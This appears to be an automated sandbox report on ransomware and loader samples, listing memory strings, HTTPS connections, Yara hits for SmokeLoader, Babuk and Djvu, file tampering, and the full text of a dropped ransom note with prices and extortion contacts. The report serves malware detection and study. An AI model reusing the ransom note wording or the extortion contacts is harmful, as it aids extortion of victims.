Source: build2.exe, 00000013.00000003.1903065829.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1852406264.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2287228950.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2114989353.0000000000A21000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2289169200.0000000000A21000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1837113139.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1903386007.0000000000A2B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1884071466.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1817467359.0000000000A1F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/subscriber_agreement/
Source: 455F.exe, 00000014.00000003.1924074897.0000000003B26000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: 455F.exe, 00000014.00000003.1924074897.0000000003B26000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: build2.exe, 00000013.00000003.2177938810.000000001F07B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.njy8xaI_aUJp
Source: build2.exe, 00000012.00000002.1803333267.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2287228950.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://t.me/t8jmhl
Source: 1601.exe, 00000010.00000002.2628394160.00000000030B0000.00000004.00000020.00020000.00000000.sdmp, 1601.exe, 00000010.00000002.2621304334.000000000090E000.00000004.00000020.00020000.00000000.sdmp, 1601.exe, 00000010.00000002.2621304334.0000000000928000.00000004.00000020.00020000.00000000.sdmp, 1601.exe, 00000011.00000002.2620858851.00000000007C2000.00000004.00000020.00020000.00000000.sdmp, 1601.exe, 00000011.00000002.2620858851.00000000007B4000.00000004.00000020.00020000.00000000.sdmp, 1601.exe, 00000011.00000002.2620858851.0000000000809000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://wetransfer.com/downloads/df01994dd8d37c2c33469922f8e7155a20240402134014/fd95b0
Source: explorer.exe, 00000002.00000000.1428983456.0000000006F94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000027.00000003.2076060809.00000000048BA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000027.00000003.2002489458.00000000048E9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000027.00000003.2002401471.00000000048F2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000027.00000002.2625226237.00000000048BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000002.00000000.1428983456.0000000006F94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000027.00000003.2076060809.00000000048BA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000027.00000003.2002489458.00000000048E9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000027.00000003.2002401471.00000000048F2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000027.00000002.2625226237.00000000048BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000002.00000000.1431282200.0000000009730000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://wns.windows.com/bat
Source: explorer.exe, 00000027.00000003.2051835284.00000000092B3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000027.00000003.2055909414.00000000092B3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000027.00000003.2059945515.00000000092B3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://word.office.com
Source: explorer.exe, 00000002.00000000.1435191718.000000000D1D6000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://word.office.com576
Source: build2.exe, 00000013.00000003.2114848022.0000000000AA4000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2021277543.0000000000AA4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.digicert.com/CPS0
Source: build2.exe, 00000013.00000003.1976258709.0000000000AEB000.00000004.00000020.00020000.00000000.sdmp, 455F.exe, 00000014.00000003.1891265405.0000000003A39000.00000004.00000800.00020000.00000000.sdmp, 455F.exe, 00000014.00000003.1891368898.0000000003A36000.00000004.00000800.00020000.00000000.sdmp, 455F.exe, 00000014.00000003.1891563712.0000000003A36000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: build2.exe, 00000013.00000003.1817467359.0000000000A2C000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1814129408.0000000000A2C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: build2.exe, 00000013.00000003.1976258709.0000000000AEB000.00000004.00000020.00020000.00000000.sdmp, 455F.exe, 00000014.00000003.1891265405.0000000003A39000.00000004.00000800.00020000.00000000.sdmp, 455F.exe, 00000014.00000003.1891368898.0000000003A36000.00000004.00000800.00020000.00000000.sdmp, 455F.exe, 00000014.00000003.1891563712.0000000003A36000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: build2.exe, 00000013.00000003.1814129408.0000000000A2C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/recaptcha/
Source: build2.exe, 00000013.00000003.1817467359.0000000000A2C000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1814129408.0000000000A2C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.cn/recaptcha/
Source: build2.exe, 00000013.00000003.1817467359.0000000000A2C000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1814129408.0000000000A2C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/recaptcha/
Source: build2.exe, 00000013.00000002.2287228950.0000000000434000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/
Source: build2.exe, 00000013.00000002.2287228950.0000000000434000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/:
Source: 455F.exe, 00000014.00000003.1924074897.0000000003B26000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.d-GHL1OW1fkT
Source: build2.exe, 00000013.00000002.2287228950.0000000000434000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/
Source: build2.exe, 00000013.00000002.2287228950.0000000000434000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/JKEBFHJDBF
Source: 455F.exe, 00000014.00000003.1924074897.0000000003B26000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.sYEKgG4Or0s6
Source: build2.exe, 00000013.00000002.2287228950.0000000000514000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2287228950.0000000000434000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: build2.exe, 00000013.00000003.2177938810.000000001F07B000.00000004.00000020.00020000.00000000.sdmp, 455F.exe, 00000014.00000003.1924074897.0000000003B26000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: build2.exe, 00000013.00000002.2287228950.0000000000434000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/vchost.exe
Source: 455F.exe, 00000014.00000003.1924074897.0000000003B26000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: build2.exe, 00000013.00000002.2287228950.0000000000514000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2287228950.0000000000434000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: build2.exe, 00000013.00000002.2287228950.0000000000434000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/chost.exe
Source: build2.exe, 00000013.00000003.2177938810.000000001F07B000.00000004.00000020.00020000.00000000.sdmp, 455F.exe, 00000014.00000003.1924074897.0000000003B26000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: explorer.exe, 00000027.00000003.2002401471.00000000048F2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000027.00000002.2625226237.00000000048BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/health/wellness/7-secrets-to-a-happy-old-age-backed-by-science/ss-AA1hwpvW
Source: explorer.exe, 00000027.00000003.2002401471.00000000048F2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000027.00000002.2625226237.00000000048BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/careersandeducation/student-loan-debt-forgiveness-arrives-for-some-b
Source: explorer.exe, 00000002.00000000.1428983456.0000000006F94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000027.00000003.2076060809.00000000048BA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000027.00000003.2002401471.00000000048F2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000027.00000002.2625226237.00000000048BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/companies/legacy-park-auction-canceled-liquidation-proposed-here-s-w
Source: explorer.exe, 00000002.00000000.1428983456.0000000006F94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000027.00000003.2076060809.00000000048BA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000027.00000003.2002401471.00000000048F2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000027.00000002.2625226237.00000000048BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/the-no-1-phrase-people-who-are-good-at-small-talk-al
Source: explorer.exe, 00000027.00000003.2002401471.00000000048F2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000027.00000002.2625226237.00000000048BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/realestate/my-husband-and-i-paid-off-our-mortgage-more-than-15-years
Source: explorer.exe, 00000027.00000003.2002401471.00000000048F2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000027.00000002.2625226237.00000000048BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/crime/bar-fight-leaves-man-in-critical-condition-suspect-arrested-in-
Source: explorer.exe, 00000027.00000003.2002401471.00000000048F2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000027.00000002.2625226237.00000000048BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/crime/one-dead-several-wounded-after-drive-by-shootings-in-south-la/a
Source: explorer.exe, 00000027.00000003.2002401471.00000000048F2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000027.00000002.2625226237.00000000048BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/opinion/decline-of-decorum-21-essential-manners-today-s-parents-fail-
Source: explorer.exe, 00000027.00000003.2002401471.00000000048F2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000027.00000002.2625226237.00000000048BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/california-workers-will-get-five-sick-days-instead-of-three-
Source: explorer.exe, 00000027.00000003.2002401471.00000000048F2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000027.00000002.2625226237.00000000048BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/world/pastor-of-atlanta-based-megachurch-faces-backlash-after-controv
Source: explorer.exe, 00000027.00000003.2002401471.00000000048F2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000027.00000002.2625226237.00000000048BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/world/ukraine-live-briefing-biden-does-worry-house-drama-will-impact-
Source: explorer.exe, 00000027.00000003.2002401471.00000000048F2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000027.00000002.2625226237.00000000048BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/california-s-reservoirs-runneth-over-in-astounding-reve
Source: explorer.exe, 00000002.00000000.1428983456.0000000006F94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000027.00000003.2076060809.00000000048BA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000027.00000003.2002489458.00000000048E9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000027.00000003.2002401471.00000000048F2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000027.00000002.2625226237.00000000048BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com:443/en-us/feed
Source: build2.exe, 00000013.00000003.1903065829.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1852406264.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2287228950.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2114989353.0000000000A21000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2289169200.0000000000A21000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1837113139.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1903386007.0000000000A2B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1884071466.0000000000A26000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
Source: build2.exe, 00000013.00000003.1817467359.0000000000A2C000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1814129408.0000000000A2C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com
Source: build2.exe, 00000013.00000003.1817467359.0000000000A2C000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1814129408.0000000000A2C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 49817 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49783
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49807 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49819
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49818
Source: unknown	Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49817
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49816
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49814
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49811
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown	Network traffic detected: HTTP traffic on port 49816 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49802 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49807
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49798 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49773 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49802
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49783 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 49819 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49798
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49818 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49814 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49775 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49811 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 443

Source: unknown	HTTPS traffic detected: 104.21.65.24:443 -> 192.168.2.10:49722 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.65.24:443 -> 192.168.2.10:49728 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.65.24:443 -> 192.168.2.10:49729 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.47.27.74:443 -> 192.168.2.10:49735 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 95.216.179.73:443 -> 192.168.2.10:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.217.100:443 -> 192.168.2.10:49741 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.217.100:443 -> 192.168.2.10:49744 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 192.185.16.114:443 -> 192.168.2.10:49751 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.65.24:443 -> 192.168.2.10:49753 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.217.100:443 -> 192.168.2.10:49754 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.217.100:443 -> 192.168.2.10:49758 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.217.238:443 -> 192.168.2.10:49761 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.217.100:443 -> 192.168.2.10:49762 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.217.100:443 -> 192.168.2.10:49767 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.217.100:443 -> 192.168.2.10:49771 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.159.133.233:443 -> 192.168.2.10:49774 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.65.24:443 -> 192.168.2.10:49777 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Yara detected SmokeLoader

Source: Yara match	File source: 00000000.00000002.1443196159.0000000002D00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1443235226.0000000002D21000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1682396136.0000000002D21000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1682358139.0000000002D00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\AppData\Local\Temp\1601.exe

Code function: 9_2_004822E0 CreateDCA,CreateCompatibleDC,GetDeviceCaps,GetDeviceCaps,GetDeviceCaps,CreateCompatibleBitmap,SelectObject,GetObjectA,BitBlt,GetBitmapBits,SelectObject,DeleteObject,DeleteDC,DeleteDC,DeleteDC,

9_2_004822E0

Spam, unwanted Advertisements and Ransom Demands

Found ransom note / readme

Source: C:\_README.txt

Dropped file: ATTENTION!Don't worry, you can return all your files!All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.The only method of recovering files is to purchase decrypt tool and unique key for you.This software will decrypt all your encrypted files.What guarantees you have?You can send one of your encrypted file from your PC and we decrypt it for free.But we can decrypt only 1 file for free. File must not contain valuable information.Do not ask assistants from youtube and recovery data sites for help in recovering your data.They can use your free decryption quota and scam you.Our contact is emails in this text document only.You can get and look video overview decrypt tool:https://wetransfer.com/downloads/df01994dd8d37c2c33469922f8e7155a20240402134014/fd95b0Price of private key and decrypt software is $999.Discount 50% available if you contact us first 72 hours, that's price for you is $499.Please note that you'll never restore your data without payment.Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours.To get this software you need write on our e-mail:support@freshingmail.topReserve e-mail address to contact us:datarestorehelpyou@airmail.ccYour personal ID:0859PsawqSTkVHfCIIwaAyDJuFpBEgzIZgY7IXD6C9ormRAzIf

Jump to dropped file

Yara detected Babuk Ransomware

Source: Yara match	File source: Process Memory Space: 1601.exe PID: 3944, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1601.exe PID: 7496, type: MEMORYSTR

Yara detected Djvu Ransomware

Source: Yara match	File source: 13.2.1601.exe.48e15a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.1601.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.1601.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.1601.exe.49515a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.1601.exe.49615a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 34.2.1601.exe.48c15a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.2.1601.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.1601.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.1601.exe.48d15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.1601.exe.48e15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.1601.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.1601.exe.49615a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 34.2.1601.exe.48c15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.1601.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.1601.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.1601.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.1601.exe.49515a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.1601.exe.48d15a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.2.1601.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.1601.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000F.00000002.1764359339.0000000004960000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2618390493.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1720687002.0000000004950000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.1908200687.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.1898227455.00000000048D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000002.2012212178.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.1771744600.00000000048E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2618108080.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.2000374378.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1747434458.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 1601.exe PID: 8176, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1601.exe PID: 5136, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1601.exe PID: 7472, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1601.exe PID: 7536, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1601.exe PID: 3944, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1601.exe PID: 7496, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1601.exe PID: 3108, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1601.exe PID: 3952, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1601.exe PID: 5068, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1601.exe PID: 6044, type: MEMORYSTR

Modifies existing user documents (likely ransomware behavior)

Source: C:\Users\user\AppData\Local\Temp\1601.exe	File moved: C:\Users\user\Desktop\EWZCVGNOWT.mp3	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1601.exe	File deleted: C:\Users\user\Desktop\EWZCVGNOWT.mp3	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1601.exe	File moved: C:\Users\user\Desktop\ZIPXYXWIOY.mp3	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1601.exe	File deleted: C:\Users\user\Desktop\ZIPXYXWIOY.mp3	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1601.exe	File moved: C:\Users\user\Desktop\PALRGUCVEH\PALRGUCVEH.docx	Jump to behavior

Writes a notice file (html or txt) to demand a ransom

Source: C:\Users\user\AppData\Local\Temp\1601.exe	File dropped: C:\_README.txt -> decrypt tool and unique key for you.this software will decrypt all your encrypted files.what guarantees you have?you can send one of your encrypted file from your pc and we decrypt it for free.but we can decrypt only 1 file for free. file must not contain valuable information.do not ask assistants from youtube and recovery data sites for help in recovering your data.they can use your free decryption quota and scam you.our contact is emails in this text document only.you can get and look video overview decrypt tool:https://wetransfer.com/downloads/df01994dd8d37c2c33469922f8e7155a20240402134014/fd95b0price of private key and decrypt software is $999.discount 50% available if you contact us first 72 hours, that's price for you is $499.please note that you'll never restore your data without payment.check your e-mail "spam" or "junk" folder if you don't get answer more than 6 hours.to get this software you need write on our e-mail:support@freshingmail.topreserve e-mail address	Jump to dropped file
